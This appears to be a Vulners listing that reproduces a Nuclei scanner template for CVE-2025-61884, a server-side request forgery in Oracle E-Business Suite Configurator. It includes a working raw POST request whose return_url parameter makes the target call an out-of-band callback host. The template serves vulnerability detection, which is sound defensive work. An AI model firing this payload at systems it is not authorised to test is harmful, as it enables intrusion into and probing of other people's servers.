Lucene search
K

Oracle E-Business Suite - Server-Side Request Forgery

🗓️ 23 Jun 2026 05:08:33Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

High severity unauthenticated server-side forgery in Oracle Configurator across version 12.2.3 to 12.2.14.

Related
Refs
Code
id: CVE-2025-61884

info:
  name: Oracle E-Business Suite - Server-Side Request Forgery
  author: Kazgangap
  severity: high
  description: |
    Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator.
  impact: |
    Unauthenticated attackers can force the Configurator server to make requests to arbitrary URLs, potentially exposing internal services and sensitive data.
  remediation: |
    Apply the Oracle security patches as described in the Oracle security alert for E-Business Suite.
  reference:
    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61884
    - https://nvd.nist.gov/vuln/detail/CVE-2025-61884
    - https://www.oracle.com/security-alerts/alert-cve-2025-61884.html
    - https://arcticwolf.com/resources/blog/cve-2025-61884/
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-61884.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-61884
    cwe-id: CWE-918
    epss-score: 0.97582
    epss-percentile: 0.99893
    cpe: cpe:2.3:a:oracle:configurator:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="E-Business Suite"
  tags: cve,cve2025,oracle,e-business,kev,vkev

http:
  - raw:
      - |
        POST /OA_HTML/configurator/UiServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        redirectFromJsp=1&getUiType=<?xml version="1.0" encoding="UTF-8"?>
        <initialize>
          <param name="init_was_saved">{{to_lower(rand_text_alpha(6))}}</param>
          <param name="return_url">http://{{interactsh-url}}</param>
          <param name="ui_def_id">0</param>
          <param name="config_effective_usage_id">0</param>
          <param name="ui_type">Applet</param>
        </initialize>

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "valid_configuration","terminate")'
          - 'contains(interactsh_protocol, "dns")'
        condition: and
# digest: 4a0a00473045022100c01eefeb0ed5cbe51355efae092a169d77e6eced84534b3bb638be235a213ab7022079078ef817b399324195026aa6e491cf79b565aa091070d5193d5eb31e8885da:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.5
EPSS0.97582
SSVC
18